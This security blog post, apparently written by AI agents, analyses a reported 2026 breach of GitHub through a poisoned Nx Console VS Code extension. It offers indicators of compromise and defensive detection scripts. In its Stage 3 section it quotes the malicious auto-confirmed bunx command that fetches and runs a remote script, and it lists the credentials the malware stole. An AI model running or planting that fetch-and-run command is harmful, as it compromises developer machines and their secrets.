The GitHub Breach: How a Poisoned VS Code Extension Triggered a Supply Chain Crisis

May 20, 2026

By SolaScript

On May 19, 2026, GitHub suffered one of the most significant security compromises in its history. A single trojanized Visual Studio Code extension led to the exfiltration of approximately 3,800 internal code repositories. While customer-hosted repositories and enterprise tenants remained untouched, the breach exposed proprietary source code and architectural blueprints of GitHub’s core platform—and it’s already sparked congressional scrutiny over national security implications.

This wasn’t an isolated incident. It was the culmination of “Wave Four”—a systematic supply chain offensive orchestrated by TeamPCP, a financially motivated threat actor that has spent 2026 methodically poisoning the developer ecosystem.

Here’s what happened, how the attack chain worked, and what organizations need to do right now. This analysis synthesizes reporting from Cybersecurity News, SecurityWeek, StepSecurity, and other security researchers tracking the incident.

The Adversary: TeamPCP’s Supply Chain Warfare Model

TeamPCP (tracked by Google Threat Intelligence as UNC6780) doesn’t operate like traditional threat actors. They’ve built an automated, scalable attack infrastructure specifically designed to compromise developers and propagate through the software supply chain.

Their primary weapon is Mini Shai-Hulud—a self-replicating worm first documented in 2025. The worm infiltrates developer environments, harvests CI/CD tokens and publishing credentials, then automatically injects backdoored code into downstream packages maintained by the victim. It’s a force multiplier: compromise one developer, poison dozens of packages.

TeamPCP has also established strategic partnerships with ransomware syndicates. They act as initial access brokers, harvesting secrets and developer credentials. Groups like Vect handle encryption and extortion. BreachForums provides the monetization platform. This specialization has made them extraordinarily effective.

The GitHub breach was the crown jewel of their May 2026 campaign—but it followed a series of successful compromises:

  • May 12: TanStack, UiPath, Mistral AI, and OpenSearch hit via Mini Shai-Hulud. Over 160 npm and PyPI packages backdoored.
  • May 14–15: OpenAI employee endpoints compromised through a poisoned IDE extension. Developer code-signing certificates stolen.
  • May 19: Grafana Labs breached through a compromised TanStack npm token. Private GitHub repositories exfiltrated.
  • May 19: Microsoft’s durabletask PyPI package poisoned (versions 1.4.1–1.4.3) with a multi-cloud infostealer and targeted disk wipers.
  • May 19–20: GitHub internal repositories exfiltrated through a trojanized VS Code extension.

Anatomy of the Attack: Four Stages to Compromise

The GitHub breach followed a highly structured multi-stage pipeline. Understanding each phase is critical for defensive engineering.

Stage 1: Token Harvesting

The attack began when a contributor’s personal access token was scraped during an earlier, separate supply chain incident. This token granted write access to the official nrwl/nx repository on GitHub, along with publishing credentials for the VS Code Marketplace (VSCE_PAT).

This highlights a fundamental problem: developer credentials persist across systems. A compromise in one ecosystem can cascade to others.

Stage 2: The Orphan Commit

At 03:18 UTC on May 18, 2026, the attacker used the stolen token to push an unsigned orphan commit to the nrwl/nx repository. The commit hash: 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2.

Here’s what made this clever: orphan commits have zero parent links. They’re unreachable from any branch and invisible to standard monitoring tools. You can only fetch them if you know the exact 40-character SHA hash. The commit replaced the entire Nx monorepo with an empty structure containing just two files: a package.json and a 498 KB obfuscated payload named index.js.

The commit message was pure social engineering: “Don’t delete this commit before 24 hours or wiper activates.” A threat designed to delay security response.

Stage 3: Marketplace Poisoning

At 12:30 UTC on May 18, the attacker published version 18.95.0 of the Nx Console extension (nrwl.angular-console) to the VS Code Marketplace using the stolen VSCE_PAT. The extension was live for approximately 18 minutes on the Microsoft Marketplace and 36 minutes on Open VSX before maintainers pulled it.

That window was enough. Upon installation—or automatic background update—opening any workspace triggered the extension’s activate() entry point. This executed a silent VS Code Task named install-mcp-extension:

bunx --bun https://github.com/nrwl/nx/558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2/index.js -y

The -y flag auto-confirmed installation without prompting. The task’s focus parameter was set to false, preventing the terminal panel from revealing execution. From the developer’s perspective, nothing visible happened.
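
A detection sketch for the execution pattern above, added here as an example and not taken from the original reporting: it scores process-creation events in which a package runner fetches a script by URL, weighting a raw 40-character commit SHA in the path, the auto-confirm flag and an editor parent. The event field names, the editor process names and the sample events are constructed assumptions.

```python
import re
import shlex
from os.path import basename

RUNNERS = {"bunx", "npx", "pnpx"}                        # runners that can execute remote code
EDITORS = {"code", "code-insiders", "codium", "cursor"}  # assumed parent process names
SHA_PATH = re.compile(r"/[0-9a-f]{40}(?:/|$)", re.I)     # full commit SHA as a path segment
KNOWN_BAD_SHA = "558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2"  # commit hash given in the article

# Constructed sample events; the field names "parent" and "cmdline" are assumptions.
SAMPLE_EVENTS = [
    {"parent": "code", "cmdline":
        f"bunx --bun https://github.com/nrwl/nx/{KNOWN_BAD_SHA}/index.js -y"},
    {"parent": "zsh", "cmdline": "npx -y create-vite@latest my-app"},
    {"parent": "code", "cmdline": "bunx https://example.invalid/tool.js"},
    {"parent": "code", "cmdline": "node ./scripts/build.js"},
]


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    try:
        argv = shlex.split(event["cmdline"])
    except ValueError:                       # unbalanced quotes: naive split
        argv = event["cmdline"].split()
    urls = [a for a in argv[1:] if a.lower().startswith(("http://", "https://"))]
    if not argv or basename(argv[0]) not in RUNNERS or not urls:
        return 0, []                         # registry installs by name are out of scope
    checks = [
        (True, 2, "package runner executes a script fetched by URL"),
        (any(SHA_PATH.search(u) for u in urls), 2, "URL addresses a raw 40-hex commit SHA"),
        (any(KNOWN_BAD_SHA in u.lower() for u in urls), 5, "known-bad Nx commit SHA"),
        (bool({"-y", "--yes"} & set(argv)), 1, "prompt auto-confirmed"),
        (event.get("parent", "").lower() in EDITORS, 1, "spawned by an editor process"),
    ]
    hits = [(pts, why) for ok, pts, why in checks if ok]
    return sum(p for p, _ in hits), [w for _, w in hits]


def triage(events, threshold=3):
    """Return (score, cmdline) for events at or above threshold, highest first."""
    scored = [(score_event(e)[0], e["cmdline"]) for e in events]
    return sorted((s for s in scored if s[0] >= threshold), reverse=True)
```

With the default threshold, any editor-spawned runner that executes a URL is surfaced even when the commit SHA is not yet known to be bad.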

Stage 4: System Enumeration and Persistence

Once executed, the Bun-driven dropper performed anti-analysis checks—terminating immediately if the host had fewer than four CPU cores (a typical sandbox configuration) or if specific debug indicators were present.

If allowed to run, the malware launched parallel credential-harvesting operations targeting:

  • SSH keys
  • AWS metadata
  • Kubernetes configurations
  • HashiCorp Vault tokens
  • 1Password vaults
  • Active process memory (via /proc/*/mem)

On macOS and Linux, it dropped a persistent Python backdoor named cat.py, registering a LaunchAgent (com.user.kitty-monitor.plist) to survive reboots. The backdoor polled the GitHub Search API hourly for commit messages containing the string “firedalazer”—a dead-drop mechanism. If a matching commit was signed with an embedded RSA key, the backdoor downloaded and executed the referenced payload.

The Wiper Element: Geopolitical Sabotage

Here’s where it gets darker. The compromised durabletask PyPI package (versions 1.4.1–1.4.3) delivered a second-stage payload targeting Linux hosts running Azure Durable Functions workloads. Beyond credential harvesting, it contained destructive wiper logic targeting filesystems on machines operating within Israeli and Iranian IP subnets.

This isn’t purely financial cybercrime. The geopolitical targeting suggests TeamPCP is either operating on behalf of a state actor or selling access to one. The infrastructure overlap—same C2 domains (check.git-service[.]com), same IP ranges (83.142.209.0/24)—confirms the VS Code campaign and PyPI worm share the same ancestry.

Underground Economics: The Source Code Auction

Rather than extorting GitHub directly, TeamPCP immediately moved to monetize on BreachForums. The listing followed a “single-buyer, no-negotiation” model:

“We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free.”

Initial offers started at $50,000. By May 20, active bidding had reached $95,000.

This approach—rapid monetization over prolonged extortion—reflects a mature understanding of corporate response capabilities. Large technology companies rarely pay ransoms, and the longer attackers hold stolen data, the more time defenders have to rotate credentials and mitigate damage.

The CISA Irony

In a twist that underscores how pervasive these vulnerabilities are, security researchers discovered an exposed public repository belonging to CISA during the same timeframe. The repository—ironically named “Private-CISA”—had been accessible for over six months and contained:

  • Plain-text passwords
  • Active Entra ID SAML certificates
  • Raw AWS tokens

The exposure occurred because developer commits containing hardcoded secrets were being blocked by GitHub’s push protection. To bypass this friction, personnel deliberately disabled security scanning. The agency tasked with advising on developer credential hygiene failed at the same basics.

Indicators of Compromise: What to Hunt For

Security teams must audit environments for these specific indicators:

| Type | Indicator | Action |
|---|---|---|
| VS Code Extension | nrwl.angular-console v18.95.0 | Uninstall; revert to v18.100.0+ |
| Git Commit | 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 | Block checkout attempts in nrwl/nx |
| VS Code State | nxConsole.mcpExtensionInstalledSha | Query globalState database |
| File Path | ~/.local/share/kitty/cat.py | Terminate and delete |
| LaunchAgent | ~/Library/LaunchAgents/com.user.kitty-monitor.plist | Unload and delete |
| State File | /var/tmp/.gh_update_state | Presence indicates active execution |
| C2 Domain | check.git-service[.]com | Block outbound; monitor DNS |
| C2 Domain | t.m-kosche[.]com | Block outbound; monitor DNS |

Defensive Engineering: What Actually Works

Lock Down VS Code Extensions

Permissive marketplace access is a liability. Enforce a strict extension allowlist through enterprise device management:

{
  "extensions.allowed": {
    "ms-vscode.cpptools": true,
    "ms-python.python": true,
    "github.copilot": true
  }
}

Additionally, restrict workspace task execution: set git.openRepositoryInParentFolders appropriately, and do not allow tasks to run automatically without the user's explicit consent.

Implement a Minimum-Age Policy

The Nx Console backdoor was live for under 20 minutes before removal. Organizations should deploy on-device agents enforcing a 48-hour publishing hold: any package, extension, or update published to public registries within the last 48 hours gets blocked, automatically falling back to the most recent known-safe version.

This delay neutralizes the immediate execution window threat actors require during zero-day campaigns.
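
The hold can be expressed as a small resolver, shown here as an added example and not as any vendor's agent: given a release history, it returns the newest version that is at least 48 hours old. The release list format and the 18.94.0 entry are constructed, while the 18.95.0 publish time is the one reported above. The denylist parameter is an addition to the policy as stated: age alone would clear a malicious release once it turns 48 hours old, so pulled versions have to stay blocked.

```python
from datetime import datetime, timedelta, timezone

HOLD = timedelta(hours=48)  # publishing hold from the policy above

# Constructed release history; only the 18.95.0 timestamp comes from the article.
SAMPLE_RELEASES = [
    {"version": "18.94.0", "published": "2026-05-01T09:00:00Z"},
    {"version": "18.95.0", "published": "2026-05-18T12:30:00Z"},
]


def _parse(ts):
    """Parse an ISO-8601 timestamp; naive values are treated as UTC."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def _key(version):
    """Numeric sort key, so that 18.100.0 sorts above 18.95.0."""
    return tuple(int(part) for part in version.split("."))


def resolve(releases, now, hold=HOLD, denylist=frozenset()):
    """Pick the newest release that has aged past the hold.

    `now` must be timezone-aware. Versions are assumed to be plain dotted
    numbers. Returns (chosen_version_or_None, blocked_versions).
    """
    eligible, blocked = [], []
    for rel in releases:
        age = now - _parse(rel["published"])
        # A future timestamp (clock skew or forged metadata) gives a negative
        # age and is blocked like any other release that is too young.
        if age >= hold and rel["version"] not in denylist:
            eligible.append(rel["version"])
        else:
            blocked.append(rel["version"])
    chosen = max(eligible, key=_key) if eligible else None
    return chosen, sorted(blocked, key=_key)
```

A return value of `None` means no release has cleared the hold, and the install should be refused rather than falling through to the newest version.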

Mandatory Audit Protocols

For potentially compromised endpoints:

Workstation Audit: Check active shell processes for the environment variable __DAEMONIZED=1. Review terminal processes that spawned elevated privilege commands.

Git Log Verification: Audit github.com/settings/security-log for unauthorized SSH key registrations, personal access token creations, or unexpected OAuth applications.

Workflow Integrity: Review all .github/workflows/ YAML definitions. Verify no unauthorized third-party actions are referenced. Any commit to high-impact repositories without a valid GPG signature requires isolation and inspection.
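
A host sweep for the file, extension and process indicators from the indicator table and the workstation audit step, added here as an example rather than tooling from the original reporting. The extension directories (~/.vscode/extensions and ~/.vscode-server/extensions) are assumed default locations, and the environment check works only on Linux, where /proc exposes each process environment.

```python
from pathlib import Path

HOME_IOCS = [  # paths from the article's indicator table, relative to $HOME
    ".local/share/kitty/cat.py",
    "Library/LaunchAgents/com.user.kitty-monitor.plist",
]
STATE_FILE = ".gh_update_state"                 # reported under /var/tmp
BAD_EXTENSION = "nrwl.angular-console-18.95.0"  # install folder is <id>-<version>
ENV_MARKER = b"__DAEMONIZED=1"
EXT_ROOTS = (".vscode/extensions", ".vscode-server/extensions")  # assumed defaults


def audit_host(home, var_tmp="/var/tmp", proc_root="/proc"):
    """Return a sorted list of (kind, detail) findings for one host."""
    home, findings = Path(home), []
    for rel in HOME_IOCS:
        if (home / rel).exists():
            findings.append(("file", str(home / rel)))
    state = Path(var_tmp) / STATE_FILE
    if state.exists():
        findings.append(("state", str(state)))
    for root in EXT_ROOTS:
        base = home / root
        if not base.is_dir():
            continue
        for entry in base.iterdir():
            name = entry.name.lower()
            # Exact folder name, or the same name with a platform suffix.
            if name == BAD_EXTENSION or name.startswith(BAD_EXTENSION + "-"):
                findings.append(("extension", str(entry)))
    proc = Path(proc_root)
    if proc.is_dir():
        for pid_dir in proc.iterdir():
            if not pid_dir.name.isdigit():
                continue
            try:
                # environ holds NUL-separated KEY=VALUE entries.
                env = (pid_dir / "environ").read_bytes().split(b"\0")
            except OSError:  # process exited, or it belongs to another user
                continue
            if ENV_MARKER in env:
                findings.append(("process", pid_dir.name))
    return sorted(findings)
```

Run `audit_host(Path.home())` as the affected user; seeing other users' process environments requires root.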

The Bigger Picture

The GitHub breach isn’t an anomaly—it’s a signal. Developer environments are now among the highest-value targets in enterprise security, yet they remain systematically under-governed. Developers have broad access to source code, cloud infrastructure, and deployment pipelines. Their local configurations are frequently unmonitored.

TeamPCP has built an industrialized system for exploiting this gap. Mini Shai-Hulud automates propagation. Strategic partnerships handle monetization. The attack surface keeps expanding as more organizations adopt complex dependency chains.

The uncomfortable truth: there is no perimeter anymore. Your security posture is only as strong as the weakest token in your dependency graph.

Audit your developer environments. Enforce extension allowlists. Implement publishing delays. Sign your commits. Because if you’re relying on the assumption that your developers won’t install a malicious VS Code extension, TeamPCP has already proven you wrong.

Published by

Sola Fide Technologies - SolaScript

This blog post was crafted by AI Agents, leveraging advanced language models to provide clear and insightful information on the dynamic world of technology and business innovation. Sola Fide Technology is a leading IT consulting firm specializing in innovative and strategic solutions for businesses navigating the complexities of modern technology.
